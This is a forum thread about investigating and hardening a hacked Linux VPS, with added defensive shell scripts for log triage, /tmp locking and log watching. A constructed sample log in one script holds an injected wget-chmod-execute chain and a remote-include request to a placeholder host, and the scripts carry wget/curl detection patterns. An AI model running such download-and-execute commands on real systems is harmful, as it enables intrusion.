Thread: [Hacked] Now what?
-
10-20-2005, 12:23 PM #1 Web Hosting Master (Join Date: Jan 2004; Location: Ellesmere Port, Wirral, UK; Posts: 1,540)
[Hacked] Now what?
Ok, just had a personal VPS hacked, which in a way is a good thing. This VPS is strictly for me to learn Linux and security, and hosts a few of my personal sites.
Now, this isn't the first time it's happened, but last time I just deleted phpBB, cleaned up /tmp and chmod 1777 it.
But now, r0nin has appeared. I don't believe they have root, since I have su - set up and it emails me when root logs in.
So, in /tmp there is the r0nin file and a folder called sql (left over from last time, although inactive); it contains a .htm, a .txt and a PHP mailer. Not too worried about these as I have practised securing this VPS, and my mail queue is still empty.
So, the question is: how do I find out who owns the files, where do I look to see how they did it, and by which domain? After I have found these things out I will be mounting /tmp noexec, nosuid etc.
Thanks, Philip
BTi-Hosting.co.uk High quality hosting, low low prices.
One step ahead of the competition - Today IS tomorrow.
FraudWise.Net - Fight the fraud!
-
10-20-2005, 12:40 PM #2 Web Hosting Evangelist (Join Date: Sep 2005; Location: Essex, England; Posts: 548)
The bash command history will come in handy in your case, I think.
-
10-20-2005, 02:47 PM #3 Web Hosting Master (Join Date: Apr 2003; Location: NC; Posts: 3,093)
ls -alh /tmp
will show the owner; it is probably nobody. Look at the Apache logs to find out where it came from, they may have something.
Noexec/nosuid will not help against perl programs, but it will help with binary programs. Bash history probably will show nothing since they were most likely put in via a PHP injection.
John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
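As an added example (not part of John W's post or the thread), here is the triage described above as a small shell script: list what in /tmp belongs to the web-server user, then pull out the access-log requests that carry a download-and-run chain or a remote-include parameter. The web user nobody, the Apache combined log format, the indicator list and the sample log lines are all assumptions made for the demo; point the functions at your own log and user.

```shell
#!/bin/sh
# Added example (not from the thread): first-pass triage of a /tmp drop on a LAMP box.
# Assumptions: Apache "combined" log format, web server running as "nobody".

# List everything in a directory owned by the web-server user, with owner and mtime.
# Files here belong to the web user almost only when a PHP/CGI script wrote them.
#   list_webuser_tmp /tmp nobody
list_webuser_tmp() {
    dir="${1:-/tmp}"
    user="${2:-nobody}"
    find "$dir" -mindepth 1 -maxdepth 2 -user "$user" -exec ls -ld {} \; 2>/dev/null
}

# Print "client-ip<TAB>request" for access-log lines whose request line carries a
# download-and-run chain (wget/curl/lynx/fetch, chmod, /tmp, /dev/shm) or a
# remote-include style parameter (?x=http://...). A few common URL encodings are
# decoded before matching so %20 and %2f do not hide the chain.
#   scan_access_log /var/log/httpd/access_log
scan_access_log() {
    awk -F'"' '
    {
        req = $2
        lc  = tolower(req)
        gsub(/%20|\+/, " ", lc)
        gsub(/%2f/,    "/", lc)
        gsub(/%3a/,    ":", lc)
        gsub(/%3b/,    ";", lc)
        if (lc ~ /(wget |curl |lynx |fetch |chmod |\/tmp(\/|;| )|\/dev\/shm)/ ||
            lc ~ /[?&][a-z0-9_]+=(http|ftp):\/\//) {
            split($1, a, " ")
            print a[1] "\t" req
        }
    }' "$@"
}

# Number of suspicious requests; handy in a cron job that mails you when it is non-zero.
count_suspicious() {
    scan_access_log "$@" | wc -l | tr -d ' '
}

# Constructed sample log (not real traffic): a normal page, an injected command chain
# fetching a binary into /tmp, an image, and a remote-include attempt. 203.0.113.0/24
# is a documentation range.
write_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [20/Oct/2005:12:01:10 +0100] "GET /forum/index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.9 - - [20/Oct/2005:12:02:51 +0100] "GET /forum/index.php?act=cd%20/tmp;wget%20http://203.0.113.7/r0nin;chmod%20755%20r0nin;./r0nin HTTP/1.1" 200 12 "-" "-"
10.0.0.12 - - [20/Oct/2005:12:03:02 +0100] "GET /images/logo.gif HTTP/1.1" 200 4096 "http://www.example.com/" "Mozilla/5.0"
10.0.0.20 - - [20/Oct/2005:12:04:15 +0100] "GET /gallery/index.php?cfg=http://203.0.113.7/shell.txt? HTTP/1.1" 200 220 "-" "-"
EOF
}
```

On the box you would run scan_access_log over each virtual host's access log in turn; the log that produces hits tells you which domain (and which script) was abused, which is what the question in the first post is after.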
-
10-20-2005, 02:52 PM #4 Web Hosting Master (Join Date: Jan 2004; Location: Ellesmere Port, Wirral, UK; Posts: 1,540)
Yep, it's nobody all right, just going to delete now, chmod again and rid wget.
Just got rid of an old version of IPB too, which I suspect was the culprit.
-
10-20-2005, 02:57 PM #5 Web Hosting Master (Join Date: Apr 2003; Location: NC; Posts: 3,093)
sometimes they use curl to download files too, there are a lot of possibilities to getting files on a system.
-
10-20-2005, 02:59 PM #6 Web Hosting Master (Join Date: Jan 2004; Location: Ellesmere Port, Wirral, UK; Posts: 1,540)
Thanks, need all the info I can get. Only been doing this for about a month, never touched Linux beforehand, but I want to be able to get servers running myself at one point, rather than wait for my admin to get outta bed.
-
10-20-2005, 03:44 PM #7 Disabled (Join Date: Dec 2002; Location: chica go go; Posts: 11,876)
Chmod wget, curl, lynx, ftp, etc to 700. I also recommend you install mod_security for apache.
-
10-20-2005, 03:49 PM #8 Web Hosting Master (Join Date: Jan 2004; Location: Ellesmere Port, Wirral, UK; Posts: 1,540)
I have mod_security installed, but could not install a ruleset because it would break all images on the VPS.
-
10-20-2005, 04:08 PM #9 Retired Moderator (Join Date: Jul 2001; Location: Singapore; Posts: 1,889)
Why delete those files in /tmp? For me, I would rather chmod them to 000, owned by root, and chattr them, so that if the same exploit from the same person, or using the same method, tries to write/create the same filenames/directories, it won't be able to because they are already there...
Just my thoughts
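As an added example (not from the post above), the placeholder idea written out as shell functions: leave the dropped name in place, root-owned, mode 000 and immutable, so a re-run of the same exploit cannot recreate or overwrite it. The path names are illustrative, and the caveat the post hints at applies: this only jams the same file name, the vulnerable script still has to go.

```shell
#!/bin/sh
# Added example (not from the thread): pin a known drop path as a dead placeholder.
# Needs root and an ext2/ext3-style filesystem for chattr; paths are examples.

# Make $1 a root-owned, mode 000, immutable object. If nothing is there yet an empty
# file is created; an existing file or directory is kept (useful as evidence) and
# locked in place. chown/chattr failures are reported, not fatal, so the function
# is safe to try as a normal user.
pin_placeholder() {
    p="$1"
    [ -e "$p" ] || : > "$p"
    chmod 000 "$p"
    chown root:root "$p" 2>/dev/null || echo "warning: could not chown $p (not root?)" >&2
    chattr +i "$p" 2>/dev/null || echo "warning: could not set +i on $p (not root, or fs lacks attrs)" >&2
}

# Prints "yes" if $1 exists with mode 000, "no" otherwise. Run it from cron: if a
# pinned name has gone back to a normal mode, somebody got through again.
is_pinned() {
    [ -e "$1" ] && [ "$(stat -c %a "$1")" = "0" ] && echo yes || echo no
}

# Undo a pin, e.g. before rebuilding /tmp on a noexec mount.
unpin_placeholder() {
    chattr -i "$1" 2>/dev/null || true
    chmod 700 "$1"
    rm -rf "$1"
}

# Usage on the box, as root:
#   pin_placeholder /tmp/r0nin; pin_placeholder /tmp/sql; is_pinned /tmp/r0nin
```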
-
10-20-2005, 04:18 PM #10 Web Hosting Master (Join Date: Jan 2004; Location: Ellesmere Port, Wirral, UK; Posts: 1,540)
Darn, I deleted them 20 seconds before reading this.
But thanks anyway, that's what this thread's for: information.
-
10-21-2005, 12:12 PM #11 Web Hosting Master (Join Date: Jan 2004; Location: Ellesmere Port, Wirral, UK; Posts: 1,540)
Well, I went back into top, saw a few more processes than usual, so I checked /tmp and guess what, it's back! How the jiggy did that happen?
Which logs do I need to check?
-
10-21-2005, 12:28 PM #12 Web Hosting Master (Join Date: Apr 2003; Location: NC; Posts: 3,093)
You are probably getting exploited by the same exploit over and over. I cannot remember if r0nin was one that needed a reboot. I would suggest installing mod_security and disabling unneeded PHP functions. Now go in and delete all the r0nin stuff and kill the processes.
-
10-21-2005, 12:33 PM #13 Web Hosting Master (Join Date: Jan 2004; Location: Ellesmere Port, Wirral, UK; Posts: 1,540)
I've disabled exec, shell_exec, passthru, popen and system. There is nothing exploitable on the server anymore, I removed IPB and phpBB before deleting the last r0nin file.
Where do I put the mod_security rules? Last time I added them to httpd.conf (I think it was) images/CSS on the server stopped loading.
Thanks, Philip
-
10-21-2005, 12:41 PM #14 Web Hosting Master (Join Date: Apr 2003; Location: NC; Posts: 3,093)
Originally posted by Philipf
I've disabled exec, shell_exec, passthru, popen and system. There is nothing exploitable on the server anymore, I removed IPB and phpBB before deleting the last r0nin file.
Where do I put the mod_security rules? Last time I added them to httpd.conf (I think it was) images/CSS on the server stopped loading.
Thanks, Philip
Also make sure you put the mod_sec rules below the AddModule/LoadModule part but not in some If section (like something controlling image types).
-
10-21-2005, 01:17 PM #15 Web Hosting Master (Join Date: Jan 2004; Location: Ellesmere Port, Wirral, UK; Posts: 1,540)
Ok, another problem now. I'm trying to secure tmp properly, using:
dd if=/dev/zero of=/dev/tmpMnt bs=1024 count=100000   # 100 MB file-backed image
mke2fs -F /dev/tmpMnt                                  # -F: it is a plain file, not a block device
mkdir -p /var/tmp
mount -o loop,noexec,nosuid,rw /dev/tmpMnt /var/tmp
chmod 1777 /var/tmp                                    # sticky bit, like a normal /tmp
mv /tmp /tmp.old                                       # ln -s fails while /tmp still exists; keep the old one until the new one works
ln -s /var/tmp /tmp
Add this to your fstab
/dev/tmpMnt /var/tmp ext2 loop,noexec,nosuid,rw 0 0
But when I type mke2fs, it says command not found, so I
'locate mke2fs'
And nothing happened, so I switched it to 'locate mkfs' and it finds it, but if I use it to make /dev/tmpmnt it says file or folder not found.
Any ideas?
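As an added example (not Philip's code or part of the thread), two checks worth running once the loop mount above is in place: read the mount options from /proc/mounts, the kernel's own view, rather than trusting fstab, and probe whether a script dropped into the directory can be executed directly. The /proc/mounts sample, the mount points and the probe file name are constructed for the demo; pass the real mount point (readlink -f /tmp, since /tmp is a symlink in the setup above).

```shell
#!/bin/sh
# Added example (not from the thread): verify a noexec,nosuid /tmp actually took.

# mount_has_opts MOUNTS_FILE MOUNTPOINT OPT...
# Exit 0 if every OPT is among the mount options recorded for MOUNTPOINT in
# MOUNTS_FILE (normally /proc/mounts), 1 if an option is missing or the path is
# not a mount point at all (e.g. you checked the symlink instead of its target).
mount_has_opts() {
    mounts="$1"; mp="$2"; shift 2
    opts=$(awk -v mp="$mp" '$2 == mp { o = $4 } END { print o }' "$mounts")
    [ -n "$opts" ] || return 1
    for want in "$@"; do
        case ",$opts," in
            *",$want,"*) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# exec_refused DIR
# Exit 0 if a freshly written script in DIR cannot be run directly (what noexec
# buys you), 1 if it runs. The probe is always removed. Note what this does NOT
# cover: "sh DIR/x" or "perl DIR/x" still works on a noexec mount, which is why
# the thread says noexec does nothing against perl scripts.
exec_refused() {
    f="$1/noexec-probe.$$"
    printf '#!/bin/sh\nexit 0\n' > "$f"
    chmod 755 "$f"
    if "$f" 2>/dev/null; then rc=1; else rc=0; fi
    rm -f "$f"
    return $rc
}

# Constructed /proc/mounts sample (not from a real box) for trying the checks offline.
write_sample_mounts() {
    cat > "$1" <<'EOF'
/dev/sda1 / ext3 rw 0 0
/dev/loop0 /var/tmp ext2 rw,nosuid,noexec 0 0
/dev/sda3 /home ext3 rw 0 0
EOF
}

# Usage on the box:
#   mount_has_opts /proc/mounts "$(readlink -f /tmp)" noexec nosuid && echo "options ok"
#   exec_refused /tmp && echo "direct execution refused"
```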
-
10-21-2005, 01:23 PM #16 Web Hosting Master (Join Date: Apr 2003; Location: NC; Posts: 3,093)
Try:
mkfs.ext2
instead
-
10-21-2005, 02:23 PM #17 Web Hosting Master (Join Date: Jan 2004; Location: Ellesmere Port, Wirral, UK; Posts: 1,540)
Gives the same error.
Tried with the path (/sbin) too but no luck, it just says mkfs.ext2: No such file or directory.
-
10-21-2005, 03:10 PM #18 Web Hosting Master (Join Date: Apr 2003; Location: NC; Posts: 3,093)
Originally posted by Philipf
Gives the same error.
Tried with the path (/sbin) too but no luck, it just says mkfs.ext2: No such file or directory.
-
10-22-2005, 05:25 PM #19 WHT Addict (Join Date: Mar 2005; Posts: 146)
What I suggest is to recompile Apache with phpsuexec enabled (you can do this with /scripts/easyapache), so Apache runs in user mode rather than as nobody. Then you can easily track the user by checking the file ownership.
-
10-22-2005, 06:44 PM #20 Web Hosting Guru (Join Date: Nov 2002; Location: Bay Area, California; Posts: 309)
Hello,
I think it's great that you are learning Linux.
But I would say that cleaning a hacked box is an undesirable thing to do. We have a lot of years of experience here, but we still prefer to reinstall if we suspect a compromise.
The best setup for a linux box, imho, is to start on your console by turning basically everything off. Then use iptables or some such to block all traffic to the box except your own.
Then you start thinking about your services, one at a time. Look at what your os provides for that service and do research. See if there are other well known packages you might consider using for providing that service.
Read about previous security problems with each package you might use to provide the service. Look for open bug reports. Look at how active the community is in responding to bug reports on each package. See if the package has a mailing list for security announcements, and for discussing issues with other users.
Consider the code. Is it in a language you can at least read? Do you feel that if you wanted to disable a feature that had been found to be insecure you might be able to do it yourself even before a patch was announced? Does the package provide useful levels of logging in order to let you monitor (programmatically) the use of the service? Do the configuration options provided by the authors look like they were considering security when they wrote it?
When you find a package you like, plan for it to be compromised and install it in a way so that even if it is compromised, an intruder will learn little or nothing, and will not gain access to other services or resources. This means use separate machines, or ip addresses, or usernames, or disk partitions, or directories, or whatever, in order to isolate this service from every other part of your system.
Then configure logging. One of the most useful things you can learn to do as a linux administrator is to write small scripts which monitor your logs. Tell your script to ignore types of lines you expect to see, and have them act, or notify you, when they see lines you don't expect to see.
Have your scripts watch the amount of use the service is getting, so you know when you have an unusual amount of usage. Have them monitor the amount of system resources the service is using so you know if it is beginning to impact other services.
Configure iptables, or whatever, to allow traffic to reach this newly configured service. Expect that some approaches to the service will be unwanted and build a banlist for the service from the very outset.
Ideally those watcher scripts you are learning to make will be able to add ips to the banlist, and control the rate of requests for service that are permitted to pass the firewall.
omg, I must stop typing. But all this is stuff you do before you even turn the service on!
Luxore
Sunwave Communications
http://www.sunwave.com/
Safety - Service - Economy
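As an added example (not part of Luxore's post), the two watcher pieces described above written as small shell functions: a filter that drops every log line matching a file of patterns you have already decided are normal and shows you only the rest, and a counter that lists clients above a request threshold as raw material for the banlist. The ban rule is printed rather than applied so a watcher bug cannot lock you out while you tune it. Patterns, threshold, the sample log lines and the 203.0.113.7 address are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the thread): log watching by exclusion plus per-IP counting.

# unexpected_lines EXPECTED_FILE LOG
# Print the lines of LOG that match none of the extended regexes in EXPECTED_FILE
# (one per line). Everything you have read and judged normal goes into the file;
# what is left over is what the watcher mails you.
unexpected_lines() {
    grep -E -v -f "$1" "$2"
}

# ips_over_threshold LOG N
# "count ip" for every client with more than N requests, most active first.
ips_over_threshold() {
    awk -v n="$2" '{ c[$1]++ } END { for (ip in c) if (c[ip] > n) print c[ip], ip }' "$1" |
        sort -rn
}

# ban_rule IP -> the iptables rule the watcher would apply. Printed, not executed:
# pipe it to sh only once you trust the patterns and the threshold.
ban_rule() {
    printf 'iptables -I INPUT -s %s -j DROP\n' "$1"
}

# Constructed sample access log (not real traffic): one regular visitor, one normal
# page view from a second client, and one client probing for admin panels.
write_sample_access_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [21/Oct/2005:09:00:01 +0100] "GET /index.php HTTP/1.1" 200 3120 "-" "Mozilla/4.0"
10.0.0.5 - - [21/Oct/2005:09:00:02 +0100] "GET /style.css HTTP/1.1" 200 810 "http://www.example.com/" "Mozilla/4.0"
10.0.0.5 - - [21/Oct/2005:09:00:02 +0100] "GET /images/logo.gif HTTP/1.1" 304 0 "http://www.example.com/" "Mozilla/4.0"
10.0.0.9 - - [21/Oct/2005:09:01:10 +0100] "GET /index.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Oct/2005:09:02:00 +0100] "GET /forum/admin/index.php HTTP/1.1" 404 210 "-" "-"
203.0.113.7 - - [21/Oct/2005:09:02:00 +0100] "GET /phpBB2/admin/index.php HTTP/1.1" 404 210 "-" "-"
203.0.113.7 - - [21/Oct/2005:09:02:01 +0100] "GET /ipb/admin/index.php HTTP/1.1" 404 210 "-" "-"
203.0.113.7 - - [21/Oct/2005:09:02:01 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "-" "-"
EOF
}

# Constructed "expected" patterns: successful (or cached) requests for the site's
# own front page, stylesheet and images. Anything else is worth a look.
write_sample_expected() {
    cat > "$1" <<'EOF'
"GET /(index\.php|style\.css|images/[^" ]*) HTTP/1\.[01]" (200|304) [0-9]+
EOF
}

# Usage on the box, e.g. from cron:
#   unexpected_lines /etc/watch/expected.re /var/log/httpd/access_log | mail -s "unexpected" root
#   ips_over_threshold /var/log/httpd/access_log 500 | while read n ip; do ban_rule "$ip"; done
```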